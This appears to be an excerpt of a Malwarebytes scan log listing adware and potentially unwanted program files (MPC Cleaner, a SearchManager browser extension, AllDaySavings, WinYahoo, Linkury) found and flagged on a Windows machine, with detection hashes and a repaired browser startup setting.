PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\SoIcon\SpeedUp_org.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\SoIcon\SpeedUp_red.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\SoIcon\SVC_green.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\SoIcon\SVC_org.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\SoIcon\SVC_red.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\SoIcon\TSK_green.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\SoIcon\TSK_org.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Image\SoIcon\TSK_red.png, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Microsoft.VC90.CRT\Microsoft.VC90.CRT.manifest, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Microsoft.VC90.CRT\msvcm90.dll, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Microsoft.VC90.CRT\msvcp90.dll, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Microsoft.VC90.CRT\msvcr90.dll, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Skin\Cleaner\Lang.xf, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Skin\Cleaner\Skin.xf, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Skin\CrashReport\Lang.xf, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Skin\CrashReport\Skin.xf, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Skin\News\Lang.xf, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Skin\News\Skin.xf, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Skin\Tray\Lang.xf, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Skin\Tray\Skin.xf, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Skin\Uninstall\Lang.xf, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.MorePowerfulCleaner, C:\Program Files (x86)\MPC Cleaner\Skin\Uninstall\Skin.xf, , [25759222d9c00f279875d7d05fa5b24e],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Local Storage\chrome-extension_bahkljhhdeciiaodlkppoonappfnheoi_0.localstorage, , [7327b1032c6dc76f70cef9b8f90bb34d],
PUP.Optional.AllDaySavings, C:\Program Files\9B0D3D35-C69A-4D44-BBF5-B75ED01D6712\kzhxnitccw.dll, , [6337c2f2cfcaf145ccb5ff16649f14ec],
PUP.Optional.AllDaySavings, C:\Program Files\9B0D3D35-C69A-4D44-BBF5-B75ED01D6712\uninstaller.exe, , [6337c2f2cfcaf145ccb5ff16649f14ec],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\manifest.json, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\content\background.html, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\content\newtab.html, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\content\chrome\common.js, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\content\chrome\lifecycle.js, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\content\chrome\settings.js, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\content\chrome\setup.js, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\content\chrome\utils.js, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\content\common\abtest.js, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\content\common\conf-sys.js, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\content\common\conf.js, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\content\common\prefs-sys.js, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\content\common\prefs.js, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\content\common\settings-dev.js, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\content\external\jquery-2.1.1.min.js, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\content\external\md5.min.js, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\content\external\string.min.js, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\content\external\underscore-min.js, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\content\search\AutoSuggest.js, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\content\search\contentscript.js, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\content\search\newtab-base.js, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\content\search\search-engines.js, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\content\search\search-form.js, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\content\search\search-images.js, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\content\search\search-redirect.js, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\skin\css\newtab.css, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\skin\css\search.css, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\skin\css\search2.css, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\skin\css\styles.css, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\skin\external\normalize.css, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\skin\fonts\HelveticaNeue-Thin.otf, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\skin\fonts\neue-bold.woff, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\skin\fonts\neue.woff, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\skin\icons\128.png, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\skin\icons\16.png, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\skin\icons\48.png, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\skin\icons\weather\01d.svg, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\skin\icons\weather\01n.svg, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\skin\icons\weather\02d.svg, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\skin\icons\weather\02n.svg, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\skin\icons\weather\03d.svg, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\skin\icons\weather\03n.svg, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\skin\icons\weather\04d.svg, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\skin\icons\weather\04n.svg, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\skin\icons\weather\09d.svg, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\skin\icons\weather\09n.svg, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\skin\icons\weather\10d.svg, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\skin\icons\weather\10n.svg, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\skin\icons\weather\11d.svg, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\skin\icons\weather\11n.svg, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\skin\icons\weather\13d.svg, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\skin\icons\weather\13n.svg, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\skin\icons\weather\50d.svg, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\skin\icons\weather\50n.svg, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\skin\images\bg.jpg, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\skin\images\bing.png, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\skin\images\bluesky-bg.jpg, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\skin\images\brush.png, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\skin\images\clock.png, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\skin\images\cloud.png, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\skin\images\cupcake-bg.jpg, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\skin\images\desk-bg.jpg, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\skin\images\doodle.png, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\skin\images\down.png, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\skin\images\google.png, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\skin\images\mountain-bg.jpg, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\skin\images\sea-bg.jpg, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\skin\images\yahoo.png, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\skin\images\yahoo.svg, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.SearchManager.ChrPRST, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Extensions\bahkljhhdeciiaodlkppoonappfnheoi\1.0.5.52_0\_metadata\verified_contents.json, , [afebcce8c9d062d447b1e55856ad8b75],
PUP.Optional.WinYahoo, C:\Users\Administrator\AppData\Local\Chromium\User Data\Default\Secure Preferences, Good: ("session":{"restore_on_startup":4,"startup_urls":["https://www.malwarebytes.org/restorebrowser/"]}}), Bad: ("session":{"restore_on_startup":4,"startup_urls":["https://uk.search.yahoo.com/yhs/web?hsp ... &uref=chmm"]}}), %5
PUP.Optional.Linkury.ACMB1, C:\Users\Administrator\AppData\Roaming\InstallationConfiguration.xml, , [f0aaa50f4b4ed95dec8759214fb629d7],

Physical Sectors: 0
(No malicious items detected)


(end)